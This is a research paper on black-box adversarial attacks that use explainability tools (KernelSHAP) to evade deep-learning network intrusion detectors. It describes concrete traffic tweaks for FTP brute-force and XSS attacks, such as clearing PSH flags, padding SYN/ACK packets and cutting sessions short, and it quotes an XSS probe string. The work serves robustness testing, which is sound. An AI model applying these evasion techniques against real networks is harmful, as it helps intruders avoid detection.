1 Introduction

Machine learning technology has become more and more popular not only in academic and industrial research but also in society. It has been introduced in various applications such as image recognition, anomaly detection, text mining, and malware detection [10, 22, 31]. Among these machine learning algorithms, deep learning (DL), in particular, has gained significant attention for its astonishing performance, equivalent to or exceeding human capabilities (such as natural language processing and decision-making). The advancements in deep learning technology have been made possible thanks to the availability of large datasets for training neural networks, as well as the remarkable advancements in hardware technology [38].

Recently, DL technologies have been introduced into cyber security products such as Network Intrusion Detection Systems (NIDS). NIDS play an important role in detecting attackers’ malicious activities in networks by monitoring network traffic. In the past, they used signature detection techniques, which could only find existing attacks. However, behavioral anomaly detection has bloomed thanks to ML/DL. Thus, they are now receiving more and more attention [17, 32, 47, 49].

DL models have been pointed out to be vulnerable to adversarial attacks, in which attackers perturbed the input data to cause a machine learning model to make incorrect predictions [14, 18, 24]. To evaluate and improve the robustness of machine learning models against them, it is common to construct Adversarial examples (AEs) to demonstrate the upper bound of the robustness [3] and design solutions to manage such attacks. This approach has led to a notable increase in studies focusing on generating AEs.

Feature-space attacks, where attackers only modify the feature vectors input to the classification model, are efficient in the computer vision field where the mapping from the image space (called the problem space in this paper) to the feature space is invertible or differentiable. In such cases, it is easy to find the perturbation in the problem space (real images) corresponding to the modification in the feature space (perturbed feature vectors), because each feature can describe a pixel that can be reconstructed based on the feature value. However, this inverse feature mapping problem is not as straightforward when perturbing feature vectors describing network traffic, and the mapping from problem space (raw network traffic space) to feature space in NIDS is neither invertible nor differentiable [36]. Furthermore, the mapping to the problem space is further complicated by the need to verify not only the feasibility of the proposed attacks in the problem space but also that the mutated malicious traffic retains its malicious properties and successfully executes its intended attack. Considering these challenges, feature-space attacks cannot be directly applied to DL-based NIDS. Instead, alternative approaches must be developed to generate AEs specifically tailored for NIDS.

Recently, the connection between eXplainable Artificial Intelligence (XAI) and AEs has been pointed out [20, 21]. XAI offers us a way to understand the decision-making processes of DL-based models [40]. In the previous work [34], we have already pointed out that interpretations given by XAI are useful for generating effective and feasible AEs against DL-based NIDS. We implemented the XAI-driven adversarial attack method and confirmed its feasibility and high evasion rate.

1.1 Contribution

In this paper, we propose new problem-space adversarial attacks on DL-based NIDS. In our proposed method, we identify features significantly contributing to detection evasion and determine how they should be perturbed by utilizing XAI. By focusing on important features and minimizing the number of perturbed features, we address the inverse feature mapping problem. Specifically, we find feasible transformations in the problem space that correspond to the perturbations in the feature space. This approach enables us to generate highly evasive AEs by fully utilizing the feature space information.

We also clarify more specific contributions compared to our previous work [34]. The previous work has several limitations. The first is that the method was a white-box approach, where the attacker has full access to the targeted NIDS information. Such a scenario is often pointed out to be impractical in previous studies [4, 11, 12]. The second limitation is that the evaluation was not convincing enough to show the general effectiveness because only one type of dataset (CIC-IDS2017) was used to construct the targeted NIDS model. In this paper, we address the drawbacks in the following ways:

  • By introducing an XAI method that does not utilize the internal information of the targeted AI, we improve the existing method from a white-box approach to a black-box approach.

  • To demonstrate the generalizability of our proposed method, we evaluated it across multiple NIDS models and attack scenarios.

Our proposed method is a black-box approach conducted in the problem space, making it more representative of real-world attack scenarios. Thus, it is useful for developers of DL-based NIDS. For instance, by executing realistic adversarial attacks using our approach, developers can perform practical robustness evaluations of their NIDS models. Furthermore, the adversarial examples generated by our method can be directly applied to adversarial training, enabling developers to strengthen their models’ robustness to such attacks.

1.2 Organization of the Paper

We introduce necessary background information to our research, such as adversarial attacks and XAI, in Sect. 2. Then, we introduce related research in Sect. 3. The white-box approach pointed out in our previous work is explained in Sects. 4. Section 5 describes our proposals. We provide the experimental settings and describe the results in Sect. 6. Section 7 concludes this paper.

2 Background

2.1 DL-based NIDS

NIDS are designed to monitor network traffic for suspicious activities and potential threats. Unlike Host-based Intrusion Detection Systems (HIDS), which are installed on individual computers to monitor inbound and outbound packets only from that particular host, NIDS are deployed at strategic points within the network to inspect all traffic in the network [2]. This makes NIDS particularly effective in detecting attacks that might not be visible at the host level, such as distributed denial-of-service (DDoS) attacks. Initial NIDS mainly used human-made signatures. However, recently, NIDS have started to adopt behavioral anomaly detection typically based on ML/DL techniques and have become able to detect unknown malicious traffic [5]

An important aspect of DL-based NIDS is its classification capability. They can be configured for binary classification, distinguishing between benign and malicious traffic, or for multi-classification, which involves identifying the specific type of attack. Depending on the required capability of NIDS, training methods also differ. For instance, supervised learning methods with “mixed datasets" containing both benign and malicious traffic are often adopted to train multi-classification models. This approach is similar to signature-based detection but with signatures being automatically learned by using ML/DL. Meanwhile, if NIDS models conduct anomaly detection, they can be trained by datasets consisting solely of legitimate traffic.

2.2 Adversarial Examples

AEs cause misclassification in a machine learning model by manipulating input data. The attacker successfully manipulates the input data to cross a decision boundary, causing that input data to be misclassified. This attack can be formulated as follows [46].

$$\begin{aligned} \begin{aligned} \text {minimize} \quad&\Vert x' - x\Vert \\ \text {subject to} \quad&f(x') = l', \\&f(x) = l, \\&l \ne l', \\&x' \in [0,1]^m, \end{aligned} \end{aligned}$$
(1)

where \(x \in [0,1]^m\) is an input to a classifier f, l is the correctly predicted class for x, and \(l' \ne l\) is the target class for \(x' = x+r\), with \(r \in [0,1]^m\) being a small perturbation to x.

Adversarial attacks are also classified based on the information available to the attacker. If an attacker knows all information, including input and output data, as well as the weights and classification labels of the target model, the attack is deemed a white-box attack. On the other hand, an attack conducted under conditions where the attacker only has access to information about the input/output data is called a black-box attack. Gray-box attacks lie in between white-box and black-box attacks, where the attacker possesses partial knowledge or limited access to the victim model.

2.3 Explainable Artificial Intelligence

In recent years, DL-based systems are increasingly being introduced across several domains. However, the non-linear nature of deep learning models, particularly those involving multiple layers of transformations, makes their decision-making processes opaque and difficult to interpret. In other words, these models can capture complex patterns, but the intricate, non-linear relationships between inputs and outputs are often “black boxes", where the reasoning behind predictions is not easily understood. That is why XAI has gained much attention these days. XAI provides us with some helpful information to understand the decision-making process of ML or DL systems.

KernelSHAP [27], a method introduced for explaining the predictions of any machine learning model, is based on Shapley values from cooperative game theory. Formally, let a function \( f: {\mathbb {R}}^n \rightarrow {\mathbb {R}} \) represent a machine learning model, and an input \( x \in {\mathbb {R}}^n \). KernelSHAP estimates the contribution of each feature to the final prediction by considering all possible subsets of the input features and computing the average marginal contribution of a feature across these subsets. The Shapley value \( \phi _i \) for a feature \( x_i \) is defined as:

$$\begin{aligned} \phi _i = \sum _{S \subseteq N \setminus \{i\}} \frac{|S|!(|N|-|S|-1)!}{|N|!} \left( f(S \cup \{i\}) - f(S) \right) \end{aligned}$$

where \( N \) is the set of all features, \( S \) is a subset of \( N \) that does not include \( i \), and \( f(S) \) represents the prediction of the model when only the features in \( S \) are present. One significant advantage of KernelSHAP is that it does not require any internal information about the model, such as weights, gradients, or biases. This makes KernelSHAP a model-agnostic approach. In this paper, we adopt KernelSHAP as it can be applied to any machine learning model, making it a versatile tool for interpreting our targeted NIDS model, which uses tabular data.

3 Related Research

3.1 DL-based IDS/NIDS

Intrusion Detection Systems (IDS) are essential tools for detecting malicious activities in cyber environments [19]. IDS are typically categorized into Host-based IDS (HIDS), which operate on individual devices, and Network-based IDS (NIDS), which monitor traffic across networks [33]. In recent years, DL techniques have gained a lot of attention in the development of IDS/NIDS due to their ability to automatically learn complex patterns and features from large-scale network data. The application of DL in IDS/NIDS has shown promising results across various domains such as IoT [48], automobiles [23], and ICS [16].

Of these various types of IDS, we focus on DL-based NIDS in this study. DL-based NIDS has gained Zhang et al. [52] proposed an MSCNN-LSTM model that integrates spatial and temporal feature extraction to improve detection accuracy on the UNSW-NB15 dataset. Sowah et al. [42] utilized artificial neural networks (ANN) for intrusion detection in mobile ad hoc networks (MANETs), demonstrating effective attack prevention and node reconfiguration. Diro et al. [8] leveraged LSTM networks for distributed attack detection in fog-to-things communications, emphasizing scalability and lightweight solutions for IoT environments. Yahalom et al. [51] addressed the high false positive rates of anomaly-based IDS by exploiting hierarchical data structures to enhance practical deployment. Sun et al. [44] introduced TDL-IDS, employing transfer learning to overcome the challenge of limited labeled data for real-world scenarios.

3.2 Adversarial Attacks against DL-based NIDS

We categorize and introduce existing research on adversarial examples for DL-based NIDS into feature-space attacks and problem-space attacks. This categorization allows us to clarify the differences between our study and previous works, thereby highlighting our contributions.

In the field of adversarial attacks targeting ML-based NIDS, feature-space attacks assume the ability of attackers to modify feature vectors input to NIDS directly. Starting with white-box attacks, existing gradient-based AE generation algorithms were applied to evade a DL-based NIDS [30, 50]. Techniques for bypassing a particular NIDS model, Kitsune [32], were proposed by Clements et al. [6]. Additionally, strategies for circumventing GAN-based NIDS detection are introduced by Piplai et al. [37]. There also exist gray- and black-box attacks. A boundary-based method designed to produce AEs for DoS attacks was proposed by Peng et al. [35], and a method for generating AEs against botnet detectors by introducing random mutations to features was presented by Apruzzese et al. [1]. Lin et al. [26] developed a GAN-based approach to generate AEs without any knowledge of the NIDS’s internal structure or parameters.

Problem-space attacks directly modify or transform network traffic to evade detection. Hashemi et al. [13] proposed a white-box attack method for multiple NIDS models. Their maximum evasion rate for this proposed method in flow-based NIDS is limited to 68%. Regarding gray-box attacks, Stinson et al. [43] proposed techniques that evade botnet detection by introducing random mutations based on the information of the detection algorithm and its implementation. Homoliak et al. [15] proposed random obfuscation techniques for evading the detection of various classifiers. Han et al. [12] proposed a black-box attack that preserves the maliciousness of attack communications while being generic and minimally overhead-intensive.

First of all, feature-space attacks cannot be directly converted to actual network traffic because feature extraction in DL-based NIDSs is not always invertible [12]. Therefore, their feasibility is limited, and they are impractical. On the other hand, while problem-space attacks are more practical than feature-space attacks, existing problem-space attacks have several drawbacks compared to our proposed method. Firstly, Hashemi et al.’s method [13] is a type of problem-space white-box attack and its evasion rate is only 68% at most. Second, since other existing attacks do not fully utilize the information in the feature space, they have to add a relatively large amount of random perturbations to the attack communication. In contrast, our method uses XAI to select important features and finds modifications in the problem space that perturb them in the feature space. As a result, the modifications in the problem space are so minimal that they may not compromise the feasibility of AEs or the maliciousness of original attacker traffic.

4 XAI-driven White-box Attacks on NIDS

In this section, we introduce the details of the XAI-driven white-box attack methods we pointed out in [34].

4.1 Targeted NIDS and Threat Model

The attack method focuses on generating AEs against DL-based NIDS. General DL-based NIDS detection flow is described in Fig. 1. First, using a packet-capturing tool, traffic in the target network is captured. Next, features are extracted from captured raw traffic. If necessary, the extracted features are pre-processed for shaping. Finally, the extracted and shaped data are input to the NIDS model, and the model returns a binary value (0: benign, 1: malicious).

In this attack method, we assume a white-box attack scenario, where the attacker possesses full access to the internal details of the targeted NIDS model. Specifically, the attacker is assumed to have detailed knowledge of the model’s architecture, including the number and type of layers, weights, biases, activation functions, and hyperparameters. Furthermore, the attacker understands the feature set used by the NIDS, such as extracted network traffic characteristics, and the process by which these features are derived from raw traffic.

Fig. 1
figure 1

General flow of DL-based NIDS

4.2 Details of the attack method

To achieve a high evasion rate of generated AEs, it is important to fully utilize information in the feature space. Therefore, our method identified effective perturbations in the feature space and then sought corresponding transformations in the problem space. However, there is an inverse feature mapping problem in the network domain: feature extraction functions are non-invertible and non-differentiable [36]. Due to this problem, the larger and more complex the perturbations in the feature space, the more difficult it becomes to find the corresponding problem-space transformations. To address it, we minimized the number of features perturbed in the feature space, aiming to simplify the feature-space perturbations. This approach also made our AEs more robust to pre-processing. For implementing effective AEs with a minimal number of perturbed features, we utilized XAI to identify key features that significantly contribute to evade detection. Additionally, to maintain semantics, we focused on perturbing the more independent features among the selected ones.

Our method consists of the following five major steps.

  1. 1.

    We test the model and analyze False Negative (FN) samples using Integrated Gradients [45] as an XAI technique. Then, we select the top k most important features contributing to the targeted model’s decision on FN samples. In this research, we deal with the case where \(k = 3\).

  2. 2.

    We plot True Positive (TP) samples and FN samples in the k-dimensional graph, whose axes are the top k features.

  3. 3.

    We calculate a correlation heatmap [29] and confirm how independent each important feature is.

  4. 4.

    From the 3D graphs and heatmap, we select the most suitable feature to be perturbed

  5. 5.

    We implement the perturbations (AEs) using the real environment and confirm whether they keep their original maliciousness

In Step (1), we utilize Integrated Gradients, which requires internal information about the targeted AI model, such as weights and biases. Thus, this method is a so-called “white-box attack." In Steps (1) and (2), we focus on FN and TP samples. That is because our goal of generating AEs is similar to transforming TP into FN. In Step (2), we plot, for instance, a graph like Fig. 2. This figure shows that TP samples are concentrated at the lower end of each axis. Meanwhile, some FN samples are situated at a higher value on both the feature B or C axes. Through the analyses, we can hypothesize that when generating AEs, we should increase the value of B or C of the malicious communication (in the direction of the white arrows in Fig. 2). For instance, if B is ‘URG flag Count,’ an attacker might send more packets with the URG flag or set the URG flag on attack packets to increase the feature value. Furthermore, if feature B is more independent than feature C, we select B as the most suitable feature to be perturbed in Step (4).

Fig. 2
figure 2

Sample 3D scatter plot: 3D distribution of True Positive (TP) and False Negative (FN) samples along the top three important features (A, B, C). TP samples cluster at the lower ends of the axes, while some FN samples are at higher values on the B or C axes. The white arrows indicate the direction in which feature manipulation could generate adversarial examples (AEs)

4.3 Evaluation

In our evaluation, we verified whether cyberattacks perturbed by our proposed method could evade detection by implementing them in a real-world network environment. When we prepared our targeted DL-based NIDS model, we trained it on a large-scale existing dataset and then fine-tuned it using a smaller set of network data generated in our real network environment. To ensure the effectiveness of this process, it was important to minimize the gap between the existing dataset and the data generated in the real network environment. Considering it, we chose the CIC-IDS2017 dataset [41] as training data because it provides detailed attack labels and descriptions of attack scenarios, which allowed us to closely replicate specific attack scenarios in our environment.

Our proposed method focuses on generating adversarial examples in the problem space. This means the selected attacks needed to be reproducible in our network environment. Although CIC-IDS2017 includes various attack scenarios, such as Brute Force, DoS, Heartbleed, Web Attack, Infiltration, Botnet, and DDoS, we chose XSS and Brute Force because their attack scenario was easier to interpret compared to other attacks. Furthermore, the two attacks have different characteristics: Brute Force is a common network-layer attack, while XSS vulnerabilities target the application layer. By using these two types of attacks, we could evaluate our method across different network layers.

We perturbed the two types of attack samples in an actual network environment and assessed the extent to which these AEs could evade detection of the NIDS model. As a result, our method attained evasion rates of 95.7% (for Brute Force) and 100.0% (for XSS). This means that the white-box attack method can generate highly evasive AEs for DL-based NIDS.

5 Our Proposal: XAI-driven Black-box Attacks on NIDS

In this section, we introduce our proposals. First, we identify two major drawbacks in the previous work [34] introduced in Sect. 4. Then, we explain the details of how our proposals address these limitations.

5.1 Limitations of the Previous Work

Impractical Attack Scenario: In the previous work, we used Integrated Gradients as an XAI method to measure the importance of features (Step 1 of our method introduced in Sect. 4.2). Integrated Gradients require not only the input and output information of the AI model being analyzed but also the gradient information. Consequently, the method introduced in Sect. 4.2 assumed a white-box scenario where the attacker has access to the internal information of the target NIDS model. However, in real-world attack scenarios, it is rare for attackers to have such access. Therefore, a white-box approach is not suitable for investigating the realistic robustness of DL-based NIDS against adversarial attacks.

Limited Evaluation Scope: Another drawback is the inadequate evaluations for the generalizability of the method. In the previous work, we implemented the white-box attacks and perturbed two types of attacks (XSS and Brute Force attack) to see if they could evade detection by an NIDS based on the CIC-IDS2017 dataset. However, this is insufficient to claim the method’s generalizability. To demonstrate it, it is necessary to validate the method across multiple datasets and different NIDS models.

5.2 Details of Our Proposals

In order to address the two drawbacks described in Sect. 5.1, we improve the existing work in the following two points.

First, to achieve more realistic and feasible adversarial attacks against DL-based NIDS, we improve the existing method by using KernelSHAP instead of Integrated Gradients to select important features. KernelSHAP does not need any of its internal information, such as gradients. This allows us to extend the existing method to a black-box approach, contributing to a more practical evaluation of the robustness of DL-based NIDS against adversarial attacks compared to the existing methods.

Second, to prove the generalizability of our proposed method, we evaluate it on multiple NIDS models. We not only implement our adversarial attacks against the NIDS based on the CIC-IDS2017 dataset, which was examined in previous research, but also using the TON_IoT dataset [25]. Both the TON_IoT and CIC-IDS2017 datasets are highly relevant and widely used NIDS benchmark datasets, yet they have different feature sets and distinct data contents. By evaluating the effectiveness of our proposed method on NIDS based on these different datasets, we show that our method is generalizable and not dependent on specific datasets or scenarios.

5.3 Flow of XAI-driven Black-box Attacks on NIDS

We describe the detailed steps of our proposed XAI-driven black-box adversarial attacks. Similar to the white-box attack we previously proposed and described in Sect. 4, this black-box attack method aims to generate effective AEs with minimal number of perturbed features. To achieve this, we utilize XAI to identify important features that significantly contribute to evading detection. While the existing methods described in Sect. 4.2 used Integrated Gradients as the XAI model, our proposed method employs KernelSHAP instead, enabling a black-box approach.

  1. 1.

    We test the model and analyze False Negative (FN) samples using KernelSHAP as an XAI technique. Then, we select the top k most important features contributing to the targeted model’s decision on FN samples. In this research, we deal with the case where \(k = 3\).

  2. 2.

    We plot True Positive (TP) samples and FN samples in the k-dimensional graph, whose axes are the top k features.

  3. 3.

    We calculate a correlation heatmap [29] and confirm how independent each important feature is.

  4. 4.

    From the 3D graphs and heatmap, we select the most suitable feature to be perturbed

  5. 5.

    We implement the perturbations (AEs) using the real environment and confirm whether they keep their original maliciousness

6 Experimental Results and Discussion

We implemented our proposed method described in Sect. 5 and perturbed two types of attacks, Brute Force attacks and Cross-Site Scripting (XSS), in an actual network environment. We prepared two types of NIDS models with different sets of input features and measured the evasion rates of the generated adversarial examples against each model. In this section, we first explain our experimental environment and implementation details of the targeted NIDS model. Then, we show the experimental results of the two attack cases and finally discuss the results.

6.1 Environment Settings

We are required to prepare a real network environment to measure the performance (feasibility and detection evasion rate) of our proposed black-box attacks, as described in Sect. 5. In the environment, an attacker host (Kali Linux) and a victim server (CentOS) are set up on the same network so that they can communicate with each other (Fig. 3). Both machines are virtual machines built on virtualization software, VMware Fusion. All network traffic actually occurred and was captured using Wireshark. Then, feature extractors capture features from the collected data. To maintain feature consistency with the training dataset used to build the base model of our targeted NIDS models, we adopted CICFlowMeter and Zeek (Bro) for each targeted NIDS model.

Fig. 3
figure 3

Network settings

6.2 Targeted NIDS Model

Our targeted NIDS models consist of an input layer, two hidden layers (with 256 neurons), and an output layer. During the learning process, we compute the cross-entropy between the labels and predictions as a loss function. The Adam optimizer (Adaptive Moment Estimation) is utilized with a learning rate of 0.01. This architecture is typical for a feedforward neural network and was also adopted in previous works [30]. To construct an NIDS model with sufficient accuracy, we need a sufficiently large and varied set of training data. However, it was difficult for us to generate such training data by using our own environment. Therefore, we first trained the targeted model using public datasets, which contain a high volume of traffic. Subsequently, we fine-tuned it with benign and malicious data generated from our environment to build the final NIDS model. To evaluate the generalizability of our proposed method, we prepare NIDS models based on different datasets: CIC-IDS2017 dataset-based model and TON_IoT dataset-based model.

We apply some pre-processing to the datasets and the data collected from our network environment:

  • Feature removal: We removed features corresponding to Flow ID, Src IP, Src Port, Dst IP, Dst Port, and Timestamp because they are flow identifiers which could lead to erroneous shortcut learning of DL-NIDS [7]. We also calculated the ratio of missing values for each feature and removed those with a missing value ratio exceeding 50%.

  • Missing value handling: After the feature removal, we employed imputation techniques on the remaining features. For categorical features with missing values, we used the most frequent value for imputation. Numeric features with missing values were imputed using the mean.

  • Min-Max normalization: We normalized the data to ensure that features with larger values do not bias the classification process. This normalization scales the feature values to a [0, 1] range.

  • Binary labels: In one attack type, we merge multiple attack categories into a single binary feature. For instance, when dealing with brute force attacks (Sect. 6.3), we categorize both FTP and SSH brute force attack labels in CIC-IDS2017 under one label, malicious. As a result, we obtain binary labels: “benign" and “malicious."

6.3 Experiment 1: Brute Force Attack

We trained two types of NIDS model: one is based on the dataset from CIC-IDS2017 dataset, and the other one is based on the TON_IoT dataset. Subsequently, we performed fine-tuning for each model using benign and malicious data generated in our actual network environment, which was generated as follows:

  • Benign traffic: Legitimate client logins to an FTP server (vsftpd), along with file uploads and downloads.

  • Malicious traffic: FTP Brute Force attacks using FTP-Patator, which is also used in creating CIC-IDS2017 dataset [41].

After fine-tuning, we tested the models with test data collected from the real environment. As shown in Table 1, they classified benign and malicious traffic with high accuracy.

Table 1 Targeted NIDS model performances

6.3.1 Evaluation on the CIC-IDS2017 Dataset-Based Model

We generated AEs of Brute Force attacks by using our proposed method. The following enumerated items correspond to those in Sect. 4.2.

  1. 1.

    Using XAI, we analyzed FN samples. We used the KernelSHAP implementation from Xplique [9] to calculate each feature’s mean impact for every FN sample. We selected the top 20 features in order of impact and plotted them in Fig. 4. From this figure, we focused on the top three most important features: (Fwd PSH Flags, Avg Packet Size, SYN Flag Count). The descriptions of these three features are as follows [41]:

    • Fwd PSH Flags: Number of times the PSH flag was set in packets traveling in the forward direction (0 for UDP).

    • Avg Packet Size: Average size of packet.

    • SYN Flag Count: Number of packets with SYN.

  2. 2.

    We created a three-dimensional graph (see Fig. 5). From this 3D scatter plot, it was clear that Fwd PSH Flags was more suitable to be perturbed than the other two features. Specifically, reducing its value could likely shift TP to FN.

  3. 3.

    We checked the independence of each feature by creating a heatmap (Fig. 6) of their correlations. The figure showed that Fwd PSH Flags had a weak correlation with other features. Also, our qualitative analysis revealed that Fwd PSH Flags, being a TCP packets’ flag count in the forward direction (from a client to a server), had little relation to other flow data features.

  4. 4.

    Based on the analyses of Fig. 5 and Fig. 6, we decided to generate adversarial examples by perturbing the Fwd PSH Flags to 0.

  5. 5.

    We implemented Python scripts to perform FTP Brute Force attacks without setting a PSH flag. In other words, we set the PSH flag to 0 for all packets sent from the attacker. We also confirmed the perturbed attacks worked successfully.

Fig. 4
figure 4

Feature importance for NIDS FN samples in Brute Force attacks (CIC-IDS2017-based model)

Fig. 5
figure 5

3D scatter plot of TP and FN samples in Brute Force attacks (CIC-IDS2017-based model)

Fig. 6
figure 6

Correlation matrix of features in Brute Force attacks of CIC-IDS2017

Our proposed AEs did not affect the original maliciousness of attacker traffic at all. To evaluate the impact of these adversarial examples, we measured the evasion rate (i.e., the fraction of malicious communication misclassified as benign). The evasion rate was 95.65%, which indicates that our proposed adversarial examples evade detection with a fairly high probability.

6.3.2 Evaluation on TON_IoT Dataset-Based Model

Following the same procedure as described in Sect. 6.3.1, AEs were generated for the ToN_IoT dataset-based model.

  1. 1.

    We analyzed the FN samples using XAI. The results are presented in Fig. 7. Based on the feature importance ranking from the graph, the top three important features identified are conn_state, service, and src_ip_bytes. However, conn_state represents the status and progress of a connection, indicating whether it is established, in progress, or has been terminated. making it difficult to be perturbed. Similarly, perturbing the value of service, which denotes the application protocol, is out of the perturbation scope because it is part of a flow identifier. Therefore, instead of these two features, we considered selecting the fourth most important feature, src_pkts, and the fifth most important feature, proto. However, proto, which represents the transport layer protocol (TCP or UDP), is also impossible to perturb. Additionally, proto is also a part of a flow identifier and out of perturbation scope. Therefore, we finally selected src_ip_bytes, src_pkts, and dst_ip_bytes. The detailed explanations of these three features are as follows:

    • src_ip_bytes: Number of bytes sent by the FTP client.

    • src_pkts: Number of packets sent by the client.

    • dst_ip_bytes: Number of IP bytes sent by the FTP server.

  2. 2.

    We plotted TP and FN samples in 3D space, as shown in Fig. 8. It can be observed that the FN samples are concentrated near the origin of the graph. Consequently, by perturbing TP samples to reduce the value of the most important feature, src_ip_bytes, we can efficiently make them evade detection by the NIDS.

  3. 3.

    The heatmap (Fig. 9) showed that src_ip_bytes had a correlation with other features. However, the correlation was comparable to that of other features. Additionally, from a qualitative perspective, when a perturbation that reduces src_ip_bytes is applied, it affects both src_bytes and src_ip_pkts.

  4. 4.

    Both src_ip_bytes and src_pkts have similar correlations with other features and share similar characteristics, so either one can be perturbed. However, src_ip_bytes had a bigger impact on FN samples than src_bytes. Thus, we decided to perturbe src_ip_bytes.

  5. 5.

    We implemented the perturbation in the problem space by terminating the TCP session each time a login attempt was made with a set of username and password. Despite these perturbations, all Brute Force attacks were successful.

Fig. 7
figure 7

Feature importance for NIDS FN samples in Brute Force attacks (TON_IoT Dataset-Based Model)

Fig. 8
figure 8

3D scatter plot of TP and FN samples in Brute Force attacks (TON_IoT Dataset-Based Model)

Fig. 9
figure 9

Correlation matrix of features in Brute Force attacks of TON_IoT Dataset

To evaluate the performance of the perturbed AEs, we measured the evasion rate, which was 100%, indicating that our proposed adversarial examples effectively bypassed detection of the TON_IoT Dataset-Based Model.

6.4 Experiment 2: XSS

In the XSS attack case, we prepared two types of NIDS models using the same methodology described in Sect. 6.3. Subsequently, we constructed a real-world environment for data collection to fine-tune our model. We set up a web server using Apache and prepared a simple e-commerce site, deliberately leaving an XSS vulnerability on the login page. For example, if an attacker entered <script>alert(‘xss’);</script> in the username field of the login form, a JavaScript alert, as depicted in Fig. 10, would appear on the screen. Data collected in such an environment include:

  • Benign traffic: Legitimate client logins and subsequent page browsing.

  • Malicious traffic: Various inputs of XSS vectors from [39] to the login page.

After fine-tuning, we evaluated the performance using test data, as illustrated in Table1, confirming the model’s high accuracy in classifying communications.

Fig. 10
figure 10

Login page after XSS

6.4.1 Evaluation on the CIC-IDS2017 Dataset-Based Model

The following enumerated items correspond to those in Sect. 4.2.

  1. 1.

    The XAI analysis results of FN samples are shown in Fig. 11. From this figure, we selected the top three features (Fwd Seg Size Min, URG Flag Count, and Bwd Packet Length Min). The detailed descriptions of these three features are as follows:

    • Fwd Seg Size Min: Minimum segment size observed in the forward direction.

    • URG Flag Count: Number of packets with URG flag.

    • Bwd Packet Length Min: Minimum size of packet in backward direction.

  2. 2.

    We plotted TP and FN samples in 3D space, as shown in Fig. 12. The graph revealed that Fwd Seg Size Min was the most critical and easy-to-perturb feature to generate adversarial examples. Specifically, increasing its value seems to cause the change from TPs to FNs.

  3. 3.

    We used a heatmap (Fig. 13) to verify the independence of each feature’s correlation. Fwd Seg Size Min had a sufficiently low correlation with other features, indicating it is more independent. Through experimental analyses, under XSS attacks, the attacker’s packets which segment size is minimum were SYN or ACK packets. We hypothesized perturbing these packets would have minimal impact on other features.

  4. 4.

    Fwd Seg Size Min had the biggest impact on FN samples and was independent enough to be perturbed.

  5. 5.

    We implemented the perturbation in the problem space by padding SYN and ACK packets from the attacker host. Even with such perturbations, all XSS attacks succeeded.

Fig. 11
figure 11

Feature importance for NIDS FN samples in XSS (CIC-IDS2017-based model)

Fig. 12
figure 12

3D scatter plot of TP and FN samples in XSS (CIC-IDS2017-based model)

Fig. 13
figure 13

Correlation matrix of features in XSS of CIC-IDS2017

We also evaluated the evasion rate of the adversarial examples. The rate was 100%, which showed that our proposed adversarial examples could completely evade the detection of the NIDS.

6.4.2 Evaluation on TON_IoT Dataset-Based Model

Following the same procedure as described in Sect. 6.4.1, we generated AEs for the ToN_IoT dataset-based model.

  1. 1.

    Fig. 14 shows the XAI analysis results of FN samples. Based on the feature importance ranking from the graph, the top three important features identified are proto, conn_state, and src_ip_bytes. However, we do not perturb proto because it is a part of a flow identifier. Furthermore, conn_state represents the summarized state for each connection, making it difficult to be perturbed. Thus, instead of these two features, we selected the fourth most important feature, src_pkts, and the fifth most important feature, duration. The detailed explanations of the selected three features are as follows:

    • src_ip_bytes: Number of sender’s (Web client) IP bytes.

    • src_pkts: Number of packets sent by the client.

    • duration: How long the connection lasted.

  2. 2.

    We plotted TP and FN samples in 3D space, as shown in Fig. 15. In this graph, the distributions of TP and FN overlap, making it difficult to distinguish between them. Therefore, we prepared an additional graph (Fig. 16) to plot only the FN samples. From these graphs, we can see that FN samples are concentrated near the origin of the graph while TP samples are relatively dispersed. This indicates that by decreasing the value of each feature, it is possible to evade the NIDS model’s detection.

  3. 3.

    The heatmap (Fig. 17) showed that the correlation of duration is smaller than the other two features.

  4. 4.

    Based on the analyses of Fig. 15, Fig. 16 and Fig. 17, we decided to generate AEs by manipulating the duration to be the closest to 0.

  5. 5.

    By terminating the session each time an XSS payload is injected into the login website, we succeeded in making duration smaller. This perturbation did not affect the XSS attacks’ function at all.

Fig. 14
figure 14

Feature importance for NIDS FN samples in XSS attacks (TON_IoT Dataset-Based Model)

Fig. 15
figure 15

3D scatter plot of TP and FN samples in XSS attacks (TON_IoT Dataset-Based Model)

Fig. 16
figure 16

3D scatter plot of only FN samples in XSS attacks (TON_IoT Dataset-Based Model)

Fig. 17
figure 17

Correlation matrix of features in XSS attacks of TON_IoT Dataset

Our proposed AEs achieved an evasion rate of 100%. These results demonstrate that our method is also effective against the TON_IoT Dataset-Based Model in the XSS attack scenario.

6.5 Discussion

We summarize the results of our experiments and compare them with those of our previous work [34] in Table 2. It illustrates that our proposed black-box attacks achieve high evasion rates across two different NIDS models and two attack scenarios. These results quantitatively prove the effectiveness of our proposed method in generating highly evasive AEs.

Table 2 Comparison of evasion rates between our proposed black-box attack and existing white-box attack

Additionally, as seen from the table, our proposed black-box attack achieved the same evasion rates as the existing white-box attacks. This reveals that our proposed method successfully keeps high performance without requiring access to the internal information of targeted models, such as gradients. The success of our black-box approach shows that it is feasible to conduct practical and effective adversarial attacks on DL-based NIDS, addressing a significant drawback of the previous white-box method. It is also observed that our method achieves a high evasion rate for both of the two different NIDS models. This indicates that the effectiveness of our method is not limited to specific feature sets or training datasets. These results suggest that our black-box method can be effectively applied to a wide range of DL-based NIDS models by enhancing its utility and relevance in real-world scenarios. In conclusion, our proposed method can contribute to evaluating and enhancing the robustness of DL-based NIDS in more realistic scenarios.

On the other hand, our study has some potential improvements. The first limitation is that the constraints in our attack scenario are still relatively moderate. The KernelSHAP used as the XAI method in our proposed attacks requires access to both the input data and output scores of the targeted NIDS model (either probabilities or, in some cases, pre-softmax logits output). This means that our proposed attacks are categorized into Score-Based Black-box Attacks, as defined in [28]. However, in real-world scenarios, it is often the case that attackers do not have access to the output scores of the targeted NIDS. Therefore, we plan to improve our proposed method so that we can generate AEs under more restrictive and realistic conditions where such scores are not available. The second limitation is that, in our approach, the selection of features to be perturbed and the implementation of AEs in the problem space is manually conducted. Given that adversarial training requires a large number of AEs, this manual generation process is not practical. In our future work, we will focus on automating our proposed method, potentially by leveraging large language models (LLMs). The third limitation of this study is the lack of comparison with other works from the other state-of-the-art methods. Performing a quantitative comparison in terms of computational cost and runtime efficiency would help clarify the advantages of our proposed method. However, our current approach involves manual processes, making it difficult to measure computational complexity in a fair and consistent manner. As part of our future work, we plan to automate these processes, which will enable us to perform runtime comparisons with other existing methods.

7 Conclusion

